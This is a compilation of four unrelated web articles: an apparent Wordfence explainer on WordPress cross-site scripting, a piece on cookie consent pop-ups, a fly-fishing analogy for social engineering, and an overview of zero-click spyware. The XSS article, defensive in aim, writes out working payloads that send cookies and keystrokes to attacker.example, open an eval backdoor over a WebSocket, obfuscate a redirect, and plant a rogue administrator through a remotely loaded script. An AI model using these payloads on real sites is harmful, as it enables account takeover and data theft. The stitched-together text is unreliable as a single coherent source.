Cross-Site Scripting: The Real WordPress Supervillain

Vulnerabilities are a fact of life for anyone managing a website, even when using a well-established content management system like WordPress. Not all vulnerabilities are equal; some allow access to sensitive data that would normally be hidden from public view, while others could allow a malicious actor to take full control of an affected website. There are many types of vulnerabilities, including broken access control, misconfiguration, data integrity failures, and injection, among others. One type of injection vulnerability that is often underestimated, but can pose a wide range of threats to a website, is Cross-Site Scripting, also known as “XSS”. In a single 30-day period, Wordfence blocked a total of 31,153,743 XSS exploit attempts, making this one of the most common attack types we see.

XSS exploit attempts blocked per day

What is Cross-Site Scripting?

Cross-Site Scripting is a type of vulnerability that allows a malicious actor to inject code, usually JavaScript, into otherwise legitimate websites. The web browser being used by the website user has no way to determine that the code is not a legitimate part of the website, so it displays content or performs actions directed by the malicious code. XSS is a relatively well-known type of vulnerability, partially because some of its uses are visible on an affected website, but there are also “invisible” uses that can be much more detrimental to website owners and their visitors.

There are three primary categories of XSS, each with different aspects that could be valuable to a malicious actor: stored, reflected, and DOM-based XSS. Stored XSS also includes a sub-type known as blind XSS.

Stored Cross-Site Scripting could be considered the most nefarious type of XSS. These vulnerabilities allow exploits to be stored on the affected server, whether in a comment, review, forum post, or other element that keeps the content stored in a database or file either long-term or permanently. Any time a victim visits a location where the script is rendered, the stored exploit will be executed in their browser.

An example of an authenticated stored XSS vulnerability can be found in version 4.16.5 or older of the Leaky Paywall plugin. This vulnerability allowed code to be entered into the Thousand Separator and Decimal Separator fields and saved in the database. Any time this tab was loaded, the saved code would load. For this example, we used the JavaScript onmouseover event handler to run the injected code whenever the mouse moved over the text box, but this could easily be changed to onload, which runs the code as soon as the page loads, or onclick, which runs it when a user clicks a specified page element. The vulnerability existed due to a lack of proper input validation and sanitization in the plugin’s class.php file. While we have chosen a less-severe example that requires administrator permissions to exploit, many other vulnerabilities of this type can be exploited by unauthenticated attackers.
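To make the mechanics concrete, here is a minimal sketch in JavaScript of how an unsanitized settings value can break out of an HTML attribute, and how escaping on output neutralizes it. The field name and rendering functions are hypothetical, for illustration only; this is not the actual plugin code.

```javascript
// A payload like this, saved into a settings field, closes the value
// attribute and adds its own event-handler attribute.
const payload = '" onmouseover="alert(document.cookie)';

// Vulnerable pattern: the stored setting is echoed straight into markup.
function renderUnsafe(value) {
  return `<input type="text" name="thousand_separator" value="${value}">`;
}

// Safer pattern: escape HTML metacharacters before output.
function escapeHtml(value) {
  return value
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}
function renderSafe(value) {
  return `<input type="text" name="thousand_separator" value="${escapeHtml(value)}">`;
}

console.log(renderUnsafe(payload)); // payload becomes a live onmouseover handler
console.log(renderSafe(payload));   // payload is rendered as inert text
```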

Example of stored XSS

Blind Cross-Site Scripting is a sub-type of stored XSS that is not rendered in a public location. As it is still stored on the server, this category is not considered a separate type of XSS itself. In an attack utilizing blind XSS, the malicious actor will need to submit their exploit to a location that would be accessed by a back-end user, such as a site administrator. One example would be a feedback form that submits feedback to the administrator regarding site features. When the administrator logs in to the website’s admin panel, and accesses the feedback, the exploit will run in the administrator’s browser.

This type of exploit is relatively common in WordPress, with malicious actors taking advantage of aspects of the site that provide data in the administrator panel. One such vulnerability was exploitable in version 13.1.5 or earlier of the WP Statistics plugin, which is designed to provide information on website visitors. If the Cache Compatibility option was enabled, then an unauthenticated user could visit any page on the site and grab the _wpnonce from the source code, and use that nonce in a specially crafted URL to inject JavaScript or other code that would run when statistics pages are accessed by an administrator. This vulnerability was the result of improper escaping and sanitization on the ‘platform’ parameter.
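Because the attacker never sees the page where a blind XSS payload fires, such payloads typically “phone home” when executed. Here is a sketch of that idea; the callback domain is a placeholder, not anything from the WP Statistics advisory:

```javascript
// The probe fires wherever a back-end user views the stored data, then
// reports the page it executed on to the attacker's server.
const callback = 'https://attacker.example/probe';
const probe =
  `<script>new Image().src='${callback}?page=' + encodeURIComponent(location.href);</script>`;

console.log(probe);
```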

Example of blind XSS

Reflected Cross-Site Scripting is a more interactive form of XSS. This type of XSS executes immediately and requires tricking the victim into submitting the malicious payload themselves, often by clicking on a crafted link or visiting an attacker-controlled form. Exploits for reflected XSS vulnerabilities often use arguments added to a URL, search results, or error messages to return data back in the browser, or to send data to a malicious actor. Essentially, the threat actor crafts a URL or form field entry to inject their malicious code, and the website incorporates that code in the submission process for the vulnerable function. Attacks utilizing reflected XSS may require an email or message containing a specially crafted link to be opened by an administrator or other site user in order to obtain the desired result from the exploit. This XSS type generally involves some degree of social engineering in order to be successful. It is also worth noting that the payload is never stored on the server, so the chance of success relies entirely on the initial interaction with the user.

In January of 2022, the Wordfence team discovered a reflected XSS vulnerability in the Profile Builder – User Profile & User Registration Forms plugin. The vulnerability allowed for simple page modification, simply by specifically crafting a URL for the site. Here we generated an alert using the site_url parameter and updated the page text to read “404 Page Not Found” as this is a common error message that will not likely cause alarm but could entice a victim to click on the redirect link that will trigger the pop-up.
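A reflected XSS link is usually just a URL with the payload tucked into a vulnerable parameter. A sketch of how such a link might be assembled; the domain is a placeholder, and site_url follows the parameter named above:

```javascript
// The payload closes the reflected context, then injects a script tag.
const payload = '"><script>alert(document.domain)</script>';

// URL-encoding hides the angle brackets from a casual glance.
const craftedUrl =
  'https://victim.example/register?site_url=' + encodeURIComponent(payload);

console.log(craftedUrl);
```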

Example of reflected XSS

DOM-Based Cross-Site Scripting is similar to reflected XSS, with the defining difference being that the modifications are made entirely in the DOM environment. Essentially, an attack using DOM-based XSS does not require any action to be taken on the server, only in the victim’s browser. While the HTTP response from the server remains unchanged, a DOM-based XSS vulnerability can still allow a malicious actor to redirect a visitor to a site under their control, or even collect sensitive data.

One example of a DOM-based vulnerability can be found in versions older than 3.4.4 of the Elementor page builder plugin. This vulnerability allowed unauthenticated users to be able to inject JavaScript code into pages that had been edited using either the free or Pro versions of Elementor. The vulnerability was in the lightbox settings, with the payload formatted as JSON and encoded in base64.
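To illustrate the general packaging, here is a sketch of attacker-controlled settings expressed as JSON and base64-encoded for transport in a URL, as in the Elementor case. The keys are illustrative, not the plugin’s actual schema, and Buffer is the Node.js stand-in for the browser’s btoa()/atob():

```javascript
// Attacker-controlled settings, serialized and encoded for the URL.
const settings = { type: 'lightbox', html: '<img src=x onerror=alert(1)>' };
const encoded = Buffer.from(JSON.stringify(settings)).toString('base64');

// The vulnerable client-side code reverses the process and renders the
// result into the DOM, executing the injected handler.
const decoded = JSON.parse(Buffer.from(encoded, 'base64').toString());
console.log(encoded);
console.log(decoded.html);
```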

Example of DOM-based XSS

How Does Cross-Site Scripting Impact WordPress Sites?

Cross-Site Scripting (XSS) vulnerabilities can have a number of repercussions for WordPress websites. Because WordPress pages are dynamically generated on load from content stored in a database, it can be easier for a malicious actor to exploit a stored or blind XSS vulnerability, which means an attacker often does not need to rely on social engineering a victim in order for their XSS payload to execute.

Using Cross-Site Scripting to Manipulate Websites

One of the most well-known ways that XSS affects WordPress websites is by manipulating the page content. This can be used to generate popups, inject spam, or even redirect a visitor to another website entirely. This use of XSS provides malicious actors with the ability to make visitors lose faith in a website, view ads or other content that would otherwise not be seen on the website, or even convince a visitor that they are interacting with the intended website despite being redirected to a look-alike domain or similar website that is under the control of the malicious actor.

When testing for XSS vulnerabilities, security researchers often use a simple method such as alert(), prompt(), or print() to test whether the browser will execute the method and display the information contained in the payload. This typically looks like the following and generally causes little to no harm to the impacted website:
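A few typical harmless probe payloads of this kind, for illustration; each simply proves that injected markup executes:

```javascript
// Each probe, if reflected or stored unescaped, pops a visible dialog.
const probes = [
  '<script>alert(document.domain)</script>', // classic script injection
  '<img src=x onerror=prompt(1)>',           // fires when the broken image errors
  '<svg onload=print()>',                    // fires as soon as the SVG loads
];

probes.forEach(p => console.log(p));
```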

Example of XSS popup

This method can also be used to prompt a visitor to provide sensitive information, or interact with the page in ways that would normally not be intended and could lead to damage to the website or stolen information.

One common type of XSS payload we see when our team performs site cleanings is a redirect. As previously mentioned, XSS vulnerabilities can utilize JavaScript to get the browser to perform actions. In this case, an attacker can use the window.location.replace() method or another similar method to redirect the victim to another site. This can be used by an attacker to redirect a site visitor to a separate malicious domain that could further infect the victim or steal sensitive information.

In this example, we used onload=location.replace("https://wordfence.com") to redirect the site to wordfence.com. The use of onload means that the script runs as soon as the element of the page that the script is attached to loads. Generating a specially crafted URL in this manner is a common method used by threat actors to get users and administrators to land on pages under the actor’s control. To further hide the attack from a potential victim, the use of URL encoding can modify the appearance of the URL to make it more difficult to spot the malicious code. This can even be taken one step further in some cases by slightly modifying the JavaScript and using character encoding prior to URL encoding. Character encoding helps bypass certain character restrictions that may prevent an attack from being successful without first encoding the payload.
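A sketch of that layering, with placeholder domains and a hypothetical vulnerable parameter: first the redirect JavaScript is character-encoded with String.fromCharCode() so filters matching on keywords like "location" miss it, then the whole payload is URL-encoded for the crafted link:

```javascript
const js = 'location.replace("https://attacker.example")';

// Character encoding: rebuild the script from character codes at runtime.
const charEncoded =
  'eval(String.fromCharCode(' +
  [...js].map(c => c.charCodeAt(0)).join(',') +
  '))';

// URL encoding: hide the payload's structure inside the crafted link.
const crafted =
  'https://victim.example/page?q=' +
  encodeURIComponent(`<svg onload='${charEncoded}'>`);

console.log(crafted);
```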

Example of XSS redirect

When discussing manipulation of websites, it is hard to ignore site defacements. This is the most obvious form of attack on a website, as it is often used to replace the intended content of the website with a message from the bad actor. This is often accomplished by using JavaScript to force the bad actor’s intended content to load in place of the original site content. Utilizing JavaScript features like document.getElementById() or window.location, it is possible to replace page elements, or even the entire page, with new content. Defacements typically rely on a stored XSS vulnerability, as the malicious actor wants to ensure that all site visitors see the defacement.
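Two illustrative defacement payloads, shown as strings; one swaps a single element, the other replaces the whole page body. The element ID and messages are hypothetical:

```javascript
// Replace one element, located by its id attribute.
const targetedDeface =
  '<script>document.getElementById("content").innerHTML = "<h1>Owned</h1>";</script>';

// Replace the entire visible page.
const fullDeface =
  '<script>document.body.innerHTML = "<h1>Site defaced</h1>";</script>';

console.log(targetedDeface);
console.log(fullDeface);
```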

Example of XSS defacement

This is, of course, not the only way to deface a website. A defacement could be as simple as modifying elements of the page, such as changing the background color or adding text to the page. These are accomplished in much the same way, by using JavaScript to replace page elements.

Stealing Data With Cross-Site Scripting

XSS is one of the easier vulnerabilities a malicious actor can exploit in order to steal data from a website. Specially crafted URLs can be sent to administrators or other site users to add elements to the page that send form data to the malicious actor in addition to, or instead of, its intended destination.

The cookies generated by a website can contain sensitive data or even allow an attacker to access an authenticated user’s account directly. One of the simplest methods of viewing the active cookies on a website is to read the document.cookie JavaScript property, which lists all cookies accessible to the page. In this example, we sent the cookies to an alert box, but they can just as easily be sent to a server under the attacker’s control, without even being noticeable to the site visitor.
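The difference between the noisy proof-of-concept and the silent theft is tiny, as this illustration shows; the attacker domain is a placeholder:

```javascript
// Visible proof-of-concept: the victim sees their own cookies.
const visible = '<script>alert(document.cookie)</script>';

// Silent variant: the same data rides out on a background request.
const silent =
  '<script>fetch("https://attacker.example/c?d=" + encodeURIComponent(document.cookie));</script>';

console.log(visible);
console.log(silent);
```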

Example of stealing cookies with XSS

While form data theft is less common, it can have a significant impact on site owners and visitors. The most common way this would be used by a malicious actor is to steal credit card information. It is possible to simply send input from a form directly to a server under the bad actor’s control; however, it is much more common to use a keylogger. Many payment processing solutions embed forms from their own sites, which typically cannot be directly accessed by JavaScript running in the context of an infected site. The use of a keylogger helps ensure that usable data will be received, which may not always be the case when simply collecting form data as it is submitted to the intended location.

Here we used character encoding to obfuscate the JavaScript keystroke collector, as well as to make it easy to run directly from a maliciously crafted link. The payload then sends collected keystrokes to a server under the threat actor’s control, where a PHP script writes them to a log file. This technique could be used, as we did here, to target specific victims, or a stored XSS vulnerability could be exploited in order to collect keystrokes from any site visitor who visits a page that loads the malicious JavaScript code. In either use case, an XSS vulnerability must exist on the target website.
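Shown decoded for readability, the collector described above boils down to a handful of lines; in a real attack this would be character-encoded as noted, and the endpoint is a placeholder:

```javascript
// The keylogger payload, as a string: each keystroke is shipped to the
// attacker's server via a throwaway image request.
const keylogger = `
<script>
document.addEventListener('keydown', function (e) {
  new Image().src =
    'https://attacker.example/k?key=' + encodeURIComponent(e.key);
});
</script>`;

console.log(keylogger);
```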

Example of XSS form theft

If this form of data theft is used on a vulnerable login page, a threat actor could easily gain access to usernames and passwords that could be used in later attacks. These attacks could be against the same website, or used in credential stuffing attacks against a variety of websites such as email services and financial institutions.

Taking Advantage of Cross-Site Scripting to Take Over Accounts

Perhaps one of the most dangerous types of attacks that are possible through XSS vulnerabilities is an account takeover. This can be accomplished through a variety of methods, including the use of stolen cookies, similar to the example above. In addition to simply using cookies to access an administrator account, malicious actors will often create fake administrator accounts under their control, and may even inject backdoors into the website. Backdoors then give the malicious actor the ability to perform further actions at a later time.

If an XSS vulnerability exists on a site, injecting a malicious administrator user can be light work for a threat actor if they can get an administrator of a vulnerable website to click a link that includes an encoded payload, or if another stored XSS vulnerability can be exploited. In this example we injected the admin user by pulling the malicious code from a web-accessible location, using a common URL shortener to further hide the true location of the malicious script. That link can then be utilized in a specially crafted URL, or injected into a vulnerable form, with something like onload=jQuery.getScript('https://bit.ly/<short_code>'); to load the script that injects a malicious admin user when the page loads.
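The remotely loaded script runs with the logged-in administrator’s session, so it can drive the normal “Add New User” flow. A sketch of the form fields involved; the credentials are placeholders, and a real request would also need the _wpnonce_create-user value scraped from the form page first:

```javascript
// Fields matching WordPress's Add New User form (wp-admin/user-new.php).
const newAdmin = new URLSearchParams({
  action: 'createuser',
  user_login: 'attacker',
  email: 'attacker@example.com',
  pass1: 'P@ssw0rd-example',
  pass2: 'P@ssw0rd-example',
  role: 'administrator',
});

// In the victim's browser the payload would then POST this with the
// admin's cookies attached, e.g.:
// fetch('/wp-admin/user-new.php', {
//   method: 'POST', credentials: 'include', body: newAdmin });

console.log(newAdmin.toString());
```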

Example of adding a malicious admin user with XSS

Backdoors are a way for a malicious actor to retain access to a website or system beyond the initial attack. This makes them very useful for any threat actor who intends to continue modifying their attack, collect data over time, or regain access if an injected malicious admin user is removed by a site administrator. While JavaScript running in an administrator’s session can be used to add PHP backdoors to a website by editing plugin or theme files, it is also possible to “backdoor” a visitor’s browser, allowing an attacker to run arbitrary commands as the victim in real time. In this example, we used a JavaScript backdoor that could be connected to from a Python shell running on a system under the threat actor’s control. This lets the threat actor run commands directly in the victim’s browser, effectively taking control of it, and potentially opening up further attacks against the victim’s computer depending on whether the browser itself has any unpatched vulnerabilities.
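The core of such a browser backdoor is small: keep a channel open to the attacker’s server and evaluate whatever arrives. A sketch, as a payload string; the command-and-control address is a placeholder, and the server side (a Python shell in our test) is omitted:

```javascript
// The payload opens a WebSocket to the attacker and eval()s each
// incoming command, sending the result back.
const backdoor = `
<script>
const ws = new WebSocket('wss://attacker.example/c2');
ws.onmessage = function (msg) {
  ws.send(String(eval(msg.data)));
};
</script>`;

console.log(backdoor);
```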

Often, a backdoor is used to retain access to a website or server, but what is unique about this example is the use of an XSS vulnerability in a website to gain access to the computer being used to browse the affected website. If a threat actor can get the JavaScript payload to load any time a visitor accesses a page, such as through a stored XSS vulnerability, then any visitor to that page becomes a potential victim.

Example of an XSS backdoor

Tools Make Light Work of Exploits

There are tools available that make it easy to exploit vulnerabilities like Cross-Site Scripting (XSS). Some tools are created by malicious actors for malicious actors, while others are created by cybersecurity professionals for the purpose of testing for vulnerabilities in order to prevent the possibility of an attack. No matter what the purpose of the tool is, if it works, malicious actors will use it. One such tool is a freely available penetration testing tool called BeEF (the Browser Exploitation Framework). This tool is designed to work with a browser to find client-side vulnerabilities in a web app. It is great for administrators, as it allows them to easily test their own web apps for XSS and other client-side vulnerabilities that may be present. The flip side is that it can also be used by threat actors looking for potential attack targets.

One thing that is consistent in all of these exploits is the use of requests to manipulate the website. These requests can be logged and used to block malicious actions based on the request parameters and the strings contained within the request. The one exception is DOM-based XSS, which cannot be logged on the web server because it is processed entirely within the victim’s browser. The request parameters malicious actors use are often common fields, such as the WordPress search parameter $_GET[‘s’], and often amount to guesswork in hopes of finding a common parameter with an exploitable vulnerability. The most common request parameter we have seen threat actors attempting to attack recently is $_GET[‘url’], which is typically used to identify the domain name of the server the website is loaded from.

Top 10 parameters in XSS attacks

Conclusion

Cross-Site Scripting (XSS) is a powerful, yet often underrated, type of vulnerability, at least when it comes to WordPress instances. While XSS has long been a staple of the OWASP Top 10, many people think of it only as the ability to inject content like a popup. Few realize that a malicious actor could use this type of vulnerability to inject spam into a web page, redirect a visitor to a website of their choice, convince a site visitor to provide their username and password, or even take over the website with relative ease, all thanks to the capabilities of JavaScript and a working knowledge of the backend platform.

One of the best ways to protect your website against XSS vulnerabilities is to keep WordPress and all of your plugins updated. Sometimes, however, attackers target a zero-day vulnerability for which no patch is immediately available, which is why the Wordfence firewall comes with built-in XSS protection to protect all Wordfence users.

Source: https://www.wordfence.com/blog/2022/09/cross-site-scripting-the-real-wordpress-supervillain

What Do Those Pesky ‘Cookie Preferences’ Pop-Ups Really Mean?

We asked the engineer who invented cookies what they mean and how to handle them.

YOU ARE NOT the only person irritated by those pesky cookie permissions boxes. If you click “Accept” by rote, you have no idea what you’re agreeing to. Or perhaps you don’t care? Many users think they have to accept all cookies to access the website, but that’s not always the case. Another option is to manage your cookies, but what does that even mean?

To find out, we spoke to Lou Montulli, the engineer who invented cookies at age 23.

“I’m just like everybody else,” says Montulli. “I want that pop-up to go away as soon as possible. The idea of asking people about permissions every single time they go to a website is annoying.”

Every website you visit places cookies on your browser. The purpose of the cookie is to allow a website to recognize a browser. That’s why you can return to a site and be recognized, even if you don’t always log in. It’s why the stuff in your shopping cart is still there the next day, or that article remembers where you stopped reading. You don’t have to “introduce” yourself every time you visit a site, but is the convenience worth it?

With Montulli’s help, here are some of the most frequently used terms those annoying permissions boxes are asking you about, and what you might want to choose when you see them.

Common Terms

First, let’s explain what some of the types of cookies you’ll see really do:

  • Session Cookies are temporary. These aren’t saved when you quit your browser.
  • Persistent Cookies will stay on your hard drive until you delete them, or your browser does. These have an expiration date written into their code. That expiration date varies depending on the site or service that issued them and is chosen by the website that places them on your browser.
  • First-Party Cookies are those placed directly onto your device by the website you’re visiting.
  • Third-Party Cookies are placed on your device, but not by the website you’re on, aka the first party. Instead, they’re put onto your device by advertisers, data partners, or any analytics tools that track visitors, usually at the request of that first party (think Google Analytics for your favorite tech magazine website, for example).
  • Strictly Necessary Cookies allow you to view a website’s content and use its features.
  • Preference Cookies, aka Functionality Cookies, allow a website to remember data you typed: for example, your user ID, password, delivery address, email, phone, and preferred method of payment.
  • Statistics Cookies, aka Performance Cookies, record how you used a website. Although these see links clicked and pages visited, your identity is not attached to these stats. These can include cookies from a third party. So if a website uses an analytics system from a third party to track what visitors do on that first-party website, it only divulges that tracking info to the website that hired the third party for analytics.
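
For the technically curious, the difference between a session cookie and a persistent cookie comes down to a single header attribute. Two illustrative, entirely hypothetical Set-Cookie headers:

```javascript
// No Expires or Max-Age attribute: the cookie dies when the browser closes.
const sessionCookie = 'Set-Cookie: cart_id=abc123; Path=/; Secure';

// With Expires, the cookie persists until the date the site chose.
const persistentCookie =
  'Set-Cookie: reader_pos=ch7; Expires=Thu, 01 Jan 2026 00:00:00 GMT; Path=/';

console.log(sessionCookie);
console.log(persistentCookie);
```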

What Am I Supposed to Choose? Does It Matter?

Montulli refers to the pop-up permissions box as “a really silly idea.” His preference would be a much more efficient and technical solution. For example, a user could choose their cookie preferences once in their browser, and every website they visit would honor that choice, similar to the design of Do Not Track. Montulli explained it like this: “Say I want to accept one type of cookie, but not that other cookie, or those cookies, any website could just ask the browser once what any user’s preferences are.” One and done.

That would be better, but what happens when you click “Accept All”—aside from thoughts like, Why does every website keep asking me these questions?

What many people (especially Americans) may not know is that in 2018, the European Union’s General Data Protection Regulation (GDPR) went into effect. And even if they have heard of it, they may not know enough to understand that this law is partially why cookie permission boxes are becoming more prevalent.

As part of GDPR, companies based outside Europe can be hit with enormous fines if they track and analyze EU visitors to their website without disclosure and consent. In other words, say your company resides in New York, but it has European visitors and customers, or collects their data. If that’s the case, it can be penalized to the tune of tens of millions in fines if it doesn’t disclose its data collection and obtain the user’s consent.

Understandably, American companies want to avoid huge fines, which is why US users are seeing more and more of these permission boxes.

The boxes are designed to offer users more control over their data, as the EU law was put into place to protect all data belonging to EU citizens and residents. The confusion within the US market exists because the country doesn’t have similar laws to protect the privacy of its citizens.

In February 2022, Saryu Nayyar wrote a piece for Forbes that asks if it’s time for a US version of GDPR. Nayyar wrote that the point of such a law would be “gaining explicit consent for collecting data and deleting data if consent is withdrawn.” That sounds like an awesome idea, but after consulting Montulli, the privacy plot thickens.

Personally, I find it impossible to separate cookies and privacy online. I asked Montulli if it’s true that everything on the internet stays on the internet.

“No,” he says. That’s because information on the internet is detached from your current online presence. The purpose of the cookie is to allow a website to know when the same browser returns. The cookie may contain additional pieces of information. “But the predominant use of it is to pass an ID to your browser as an identifier,” he says.

Source: https://www.wired.com/story/what-do-cookie-preferences-pop-ups-mean/

Why Cybercrime is like Trout Fishing

“Why push on a locked door when there’s an open window?”

As any seasoned fly angler knows, trout are highly selective, continuous feeders whose entire survival strategy centers on conserving energy, remaining close to a safe holding place, and gaining maximum protein intake with minimal movement. To fool the wily trout, fly anglers have developed a practice called “matching the hatch”: presenting an artificial fly that most resembles what the trout are currently feeding on and getting it close to where a feeding trout is holding. And often, with the right presentation, the trout is fooled and hooked.

So what does fly fishing have to do with cyber security?

In many ways, cyber criminals behave exactly like seasoned fly anglers. Rarely do they waste time, energy and resources bombarding a company’s firewall. Or in the case of fly fishing, randomly cast using any fly pattern available. And as cybercrime becomes more sophisticated and controlled by criminal gangs and nation states, they favor a targeted approach. Cybercriminals today look for the easiest and quickest way through a company’s security defenses, often focusing on individual employees using an approach called social engineering.

Cybercriminals, like fly anglers, look for the easiest way to fool their target. And in today’s disrupted business world that often means employees working from home, where in most cases the home environment is far less secure than the office IT environment. They also, like a fly angler matching the hatch, impersonate senior executives, demanding that a lower-level employee (for example, from the finance department) wire money immediately to a (fake) client account. All too often the employee, upon receiving an urgent email from a named senior executive, complies.

The savvy trout angler spends a great deal of time understanding the trout species they are targeting, the river environment, the types of insect life and potential food sources, most active feeding times etc. They even visit nearby fly shops and talk with knowledgeable fishing guides for specific information. They build a knowledge base used to match the hatch and fool the trout.

In a similar way, a cybercriminal spends a great amount of time researching the company they are targeting. They scour LinkedIn profiles, search company websites for the names and titles of employees, and gather information about employees on Facebook, Tinder, Instagram, Snapchat, and other social media platforms. Recently they have begun to telephone employees at home pretending to be a legitimate research company, even offering cash for answering survey questions. In many cases, employee emails and other confidential information can be purchased from other criminal groups on the dark net. Using all this information, they put together a list of potential employees to target with phishing emails and social engineering.

Trout anglers know that older and larger trout are more “educated” at spotting real food versus an angler’s imitation. Older trout have probably seen numerous presentations from lots of different anglers and learned to be wary and highly selective. Also, the clearer the water, the more wary trout are in general, to protect themselves from predators. Smaller, younger trout have yet to learn and are easier to fool.

Cybercriminals know that new employees are easier to fool as well. This is especially true when cyber security training is minimal and there is little peer-to-peer education about what to watch out for when it comes to email phishing and social engineering. And working from home has in most cases reduced the amount of team learning and peer-to-peer interaction, which provides a safe place for new employees to ask questions and seek advice. In many training classes, few employees want to be singled out for asking “naïve” questions.

A Human Approach to Mitigating Cybercrime

To blunt the growing impact of cybercrime, companies need to focus more on the human aspect of cyber security. In most organizations, 98% of the cyber security budget is spent on technology and less than 2% on employees. Yet 88% of cyber breaches are the result of human error, poor cyber hygiene, mismanagement, and insider actions. Just 12% of breaches are due to technology failures. And 61% of cyber victims fail to report the incident. 

The analogy between fly fishing and cybercrime offers many opportunities for companies to improve their cyber security. For example, clarity of water in a trout stream is easily equated with open transparency and cross-functional communications in the corporate world. Learning from others, on-going communications about attempted cyberattacks and successful breaches allows everyone to learn quickly and become more aware and accountable. Having the IT department help secure the home technology and internet environment of senior executives, Board Directors and other high value targets helps prevent breaches and high-value-employee data mining by cyber criminals. Adding additional support for the cyber security and IT team to improve and keep on top of cyber hygiene, patches and software upgrades can go a long way in mitigating cyber risks.

Cyber security is the number one threat to businesses and organizations everywhere. Between 2020 and 2021, ransomware attacks increased by 60%, with the average ransomware payment approaching $4.5 million (IBM). And that’s just the payment to the hackers. The cost of downtime, lost revenue, reputational damage and decline in market value is nearly 10 times the ransom payment.

It is past time senior leaders prioritize the human firewall. Otherwise cybercrime will continue to grow and pose an ever-growing threat to our global economy and way of life.

Source: https://www.linkedin.com/pulse/why-cybercrime-like-trout-fishing-john-r-childress/?trk=public_post

Zero-click attacks explained, and why they are so dangerous

Zero-click attacks, especially when combined with zero-day vulnerabilities, are difficult to detect and becoming more common.

Zero-click attack definition

Zero-click attacks, unlike most cyberattacks, don’t require any interaction from the users they target, such as clicking on a link, enabling macros, or launching an executable. They are sophisticated, often used in cyberespionage campaigns, and tend to leave very few traces behind—which makes them dangerous.

Once a device is compromised, an attacker can choose to install surveillance software, or they can choose to enact a much more destructive strategy by encrypting the files and holding them for ransom. Generally, a victim can’t tell when and how they’ve been infected through a zero-click attack, which means users can do little to protect themselves.

How zero-click attacks work

Zero-click attacks have become increasingly popular in recent years, fueled by the rapidly growing surveillance industry. One of the best-known spyware tools is NSO Group’s Pegasus, which has been used to monitor journalists, activists, world leaders, and company executives. While it’s not clear how each victim was targeted, it is believed that at least a few of them received a WhatsApp call they didn’t even have to answer.

Messaging apps are often targeted in zero-click attacks because they receive large amounts of data from unknown sources without requiring any action from the device owner. Most often, the attackers exploit a flaw in how data is validated or processed.
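To make the idea concrete, here is a hypothetical sketch (not any real app's code) of the kind of validation flaw described above. The toy message format, a 2-byte big-endian length header followed by a payload, is invented for illustration; the naive parser trusts the attacker-controlled length field, while the hardened parser checks it against the data actually received.

```python
# Toy length-prefixed message format: 2-byte big-endian length, then payload.
# The "naive" parser trusts the declared length; the "safe" parser validates
# it the way a hardened messaging app should.

import struct

MAX_PAYLOAD = 4096  # arbitrary sane upper bound for this toy protocol

def parse_naive(buf: bytes) -> bytes:
    # Blindly trusts the attacker-controlled length field. In Python this
    # merely truncates; in C-like code the same logic can over-read memory.
    (length,) = struct.unpack_from(">H", buf, 0)
    return buf[2:2 + length]

def parse_safe(buf: bytes) -> bytes:
    # Rejects messages whose declared length disagrees with reality.
    if len(buf) < 2:
        raise ValueError("message too short for header")
    (length,) = struct.unpack_from(">H", buf, 0)
    if length > MAX_PAYLOAD or 2 + length != len(buf):
        raise ValueError("declared length does not match actual payload")
    return buf[2:2 + length]
```

The difference between the two functions is exactly the gap zero-click exploits aim for: data that arrives and is processed before the user does anything.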

Other less-known zero-click attack types have stayed under the radar, says Aamir Lakhani, cybersecurity researcher at Fortinet’s FortiGuard Labs. He gives two examples: parser application exploits (“while a user views a picture in a PDF or a mail application, the attacker is silently exploiting a system without user clicks or interaction needed”) and “WiFi proximity attacks that seek to find exploits on a WiFi stack and upload exploit code into [the] user’s space [in the] kernel to remotely take over systems.”

Zero-click attacks often rely on zero-days, vulnerabilities that are unknown to the software maker. Not knowing they exist, the maker can’t issue patches to fix them, which can put users at risk. “Even very alert and aware users cannot avoid those double-whammy zero-day and zero-click attacks,” Lakhani says.

These attacks are often used against high-value targets because they are expensive. “Zerodium, which purchases vulnerabilities on the open market, pays up to $2.5M for zero-click vulnerabilities against Android,” says Ryan Olson, vice president of threat intelligence, Unit 42 at Palo Alto Networks.

Examples of zero-click attacks

The target of a zero-click attack can be anything from a smartphone to a desktop computer and even an IoT device. One of the first defining moments in their history happened in 2010 when security researcher Chris Paget demonstrated at DEF CON 18 how to intercept phone calls and text messages using a Global System for Mobile Communications (GSM) vulnerability, explaining that the GSM protocol is broken by design. During his demo, he showed how easy it was for his international mobile subscriber identity (IMSI) catcher to intercept the mobile phone traffic of the audience.

Another early zero-click threat was discovered in 2015 when the Android malware family Shedun took advantage of the Android Accessibility Service’s legitimate functions to install adware without the user doing anything. “By gaining the permission to use the accessibility service, Shedun is able to read the text that appears on screen, determine if an application installation prompt is shown, scroll through the permission list, and finally, press the install button without any physical interaction from the user,” according to Lookout.

A year later, in 2016, things got even more complicated. A zero-click exploit was incorporated into Karma, a surveillance tool used by the United Arab Emirates, which took advantage of a zero-day found in iMessage. Karma needed only a user’s phone number or email address. A text message was then sent to the victim, who didn’t even have to click on a link to be infected.

Once that text arrived on an iPhone, the attackers were able to see photos, emails, and location data, among other items. The hacking unit that used this tool, dubbed Project Raven, included U.S. intelligence hackers who helped the United Arab Emirates monitor governments and human rights activists.

By the end of that decade, zero-click attacks were being noticed more often, as surveillance companies and nation-state actors started to develop tools that didn’t require any action from the user. “Attacks that we were previously seeing through links in SMS, moved to zero-click attacks by network injections,” says Etienne Maynier, technologist at Amnesty International.

Amnesty and the Citizen Lab worked on several cases involving NSO Group’s Pegasus spyware, which was linked to several murders, including that of the Washington Post journalist Jamal Khashoggi. Once installed on a phone, Pegasus can read text messages, track calls, monitor a victim’s location, access the device’s mic and camera, collect passwords, and gather information from apps.

Khashoggi and those close to him were not the only victims. In 2019, a flaw in WhatsApp was exploited to target civil society and political figures in Catalonia. The attack started with a WhatsApp video call to the victim. Answering the call wasn’t necessary, as the data sent to the chat app wasn’t sanitized properly. This allowed the Pegasus code to be executed on the target device, effectively installing the spyware. WhatsApp has since patched this vulnerability and notified 1,400 users who had been targeted.

Another sophisticated zero-click attack associated with NSO Group’s Pegasus was based on a vulnerability in Apple’s iMessage. In 2021, Citizen Lab found traces of this exploit being used to target a Saudi activist. This attack relies on an error in the way GIFs are parsed in iMessage and disguises a PDF document containing malicious code as a GIF. In its analysis of the exploit, Google Project Zero stated, “The most striking takeaway is the depth of the attack surface reachable from what would hopefully be a fairly constrained sandbox.” The iMessage vulnerability was fixed on September 13, 2021, in iOS 14.8.

